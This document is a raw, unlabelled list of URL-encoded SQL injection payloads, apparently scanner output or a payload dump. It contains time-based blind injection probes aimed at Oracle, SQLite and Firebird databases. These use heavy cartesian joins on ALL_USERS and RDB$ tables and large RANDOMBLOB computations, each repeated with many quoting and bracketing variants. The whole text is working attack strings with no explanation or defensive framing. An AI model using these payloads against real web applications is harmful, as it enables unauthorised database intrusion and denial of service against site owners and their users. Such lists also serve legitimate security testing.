1%27%29%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27ipVV%27%3D%27ipVV 1%27%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27xXwt%27%3D%27xXwt 1%27%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27etHx%27%20LIKE%20%27etHx 1%27%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27teFr%27%20LIKE%20%27teFr 1%27%29%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27zpUw%27%20LIKE%20%27zpUw 1%27%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27XplE%27%20LIKE%20%27XplE 1%22%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22SCjX%22%3D%22SCjX 1%22%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22IwKo%22%3D%22IwKo 1%22%29%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22adbB%22%3D%22adbB 1%22%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22tbMo%22%3D%22tbMo 1%22%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22ZKEL%22%20LIKE%20%22ZKEL 1%22%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22XjBT%22%20LIKE%20%22XjBT 1%22%29%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22cFEG%22%20LIKE%20%22cFEG 1%22%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22rHRf%22%20LIKE%20%22rHRf 1%29%20WHERE%206137%3D6137%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20WHERE%203638%3D3638%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20WHERE%207717%3D7717%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20WHERE%207327%3D7327%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20%7C%7C%20%28SELECT%204184%20FROM%20DUAL%20WHERE%208483%3D8483%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206555%20WHERE%206914%3D6914%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%204664%20FROM%20DUAL%20WHERE%201582%3D1582%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 1%20%2B%20%28SELECT%201717%20WHERE%204947%3D4947%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 1%27%20%2B%20%28SELECT%20%27bfQW%27%20FROM%20DUAL%20WHERE%205408%3D5408%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZScb%27%20WHERE%206172%3D6172%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%23 1%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%22%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%284829%3D4829 1%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%283850%3D3850 1%29%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%282523%3D2523 1%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27oRzy%27%3D%27oRzy 1%27%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27jgha%27%3D%27jgha 1%27%29%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27zAMY%27%3D%27zAMY 1%27%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27nQEW%27%3D%27nQEW 1%27%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27zXFU%27%20LIKE%20%27zXFU 1%27%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27vDZf%27%20LIKE%20%27vDZf 1%27%29%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27ODiD%27%20LIKE%20%27ODiD 1%27%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27QvAv%27%20LIKE%20%27QvAv 1%22%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22vjoS%22%3D%22vjoS 1%22%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22pVfg%22%3D%22pVfg 1%22%29%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22uFbP%22%3D%22uFbP 1%22%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22eGvR%22%3D%22eGvR 1%22%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22sPIB%22%20LIKE%20%22sPIB 1%22%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22TvmQ%22%20LIKE%20%22TvmQ 1%22%29%29%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22tsdK%22%20LIKE%20%22tsdK 1%22%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22RVJC%22%20LIKE%20%22RVJC 1%29%20WHERE%205244%3D5244%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%29%20WHERE%207195%3D7195%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%20WHERE%208023%3D8023%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%22%20WHERE%208353%3D8353%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1%27%20%7C%7C%20%28SELECT%205116%20FROM%20DUAL%20WHERE%206637%3D6637%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209294%20WHERE%209074%3D9074%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209231%20FROM%20DUAL%20WHERE%209704%3D9704%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 1%20%2B%20%28SELECT%209396%20WHERE%202291%3D2291%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 1%27%20%2B%20%28SELECT%20%27LTMs%27%20FROM%20DUAL%20WHERE%205861%3D5861%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZzKK%27%20WHERE%204099%3D4099%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204206%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%23 1%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%22%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%289047%3D9047 1%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%288265%3D8265 1%29%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%286809%3D6809 1%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27Ftmk%27%3D%27Ftmk 1%27%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27uNuo%27%3D%27uNuo 1%27%29%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27GRWj%27%3D%27GRWj 1%27%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27VcHb%27%3D%27VcHb 1%27%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27EyUS%27%20LIKE%20%27EyUS 1%27%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27wHAq%27%20LIKE%20%27wHAq 1%27%29%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27QllW%27%20LIKE%20%27QllW 1%27%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27fabh%27%20LIKE%20%27fabh 1%22%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22YWxm%22%3D%22YWxm 1%22%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22UzBn%22%3D%22UzBn 1%22%29%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22OAmm%22%3D%22OAmm 1%22%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22zmIL%22%3D%22zmIL 1%22%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22hygn%22%20LIKE%20%22hygn 1%22%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22qbLp%22%20LIKE%20%22qbLp 1%22%29%29%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22WfDC%22%20LIKE%20%22WfDC 1%22%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22RzIF%22%20LIKE%20%22RzIF 1%29%20WHERE%209140%3D9140%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%29%20WHERE%208627%3D8627%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%20WHERE%204509%3D4509%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%22%20WHERE%208780%3D8780%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1%27%20%7C%7C%20%28SELECT%206245%20FROM%20DUAL%20WHERE%204141%3D4141%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209466%20WHERE%204567%3D4567%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203962%20FROM%20DUAL%20WHERE%204747%3D4747%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 1%20%2B%20%28SELECT%202018%20WHERE%208329%3D8329%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 1%27%20%2B%20%28SELECT%20%27JNZX%27%20FROM%20DUAL%20WHERE%203740%3D3740%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PwPl%27%20WHERE%201020%3D1020%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208964%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%23 1%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%22%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%282903%3D2903 1%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%286255%3D6255 1%29%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%284950%3D4950 1%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27ewJw%27%3D%27ewJw 1%27%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27WzMH%27%3D%27WzMH 1%27%29%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27FYXl%27%3D%27FYXl 1%27%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27mJBP%27%3D%27mJBP 1%27%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27dQZD%27%20LIKE%20%27dQZD 1%27%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27OwPJ%27%20LIKE%20%27OwPJ 1%27%29%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27VWZq%27%20LIKE%20%27VWZq 1%27%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27eSIX%27%20LIKE%20%27eSIX 1%22%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22FhDb%22%3D%22FhDb 1%22%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22tHFn%22%3D%22tHFn 1%22%29%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22PoMR%22%3D%22PoMR 1%22%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22BRNi%22%3D%22BRNi 1%22%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22VImm%22%20LIKE%20%22VImm 1%22%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22SaXU%22%20LIKE%20%22SaXU 1%22%29%29%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22mySI%22%20LIKE%20%22mySI 1%22%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22qZyS%22%20LIKE%20%22qZyS 1%29%20WHERE%201100%3D1100%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%29%20WHERE%208663%3D8663%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%20WHERE%202691%3D2691%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%22%20WHERE%206635%3D6635%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1%27%20%7C%7C%20%28SELECT%202726%20FROM%20DUAL%20WHERE%203426%3D3426%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204942%20WHERE%202090%3D2090%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%206854%20FROM%20DUAL%20WHERE%202670%3D2670%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 1%20%2B%20%28SELECT%204562%20WHERE%207067%3D7067%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 1%27%20%2B%20%28SELECT%20%27OGDX%27%20FROM%20DUAL%20WHERE%201275%3D1275%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27XBXZ%27%20WHERE%206459%3D6459%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202898%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%23 1%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 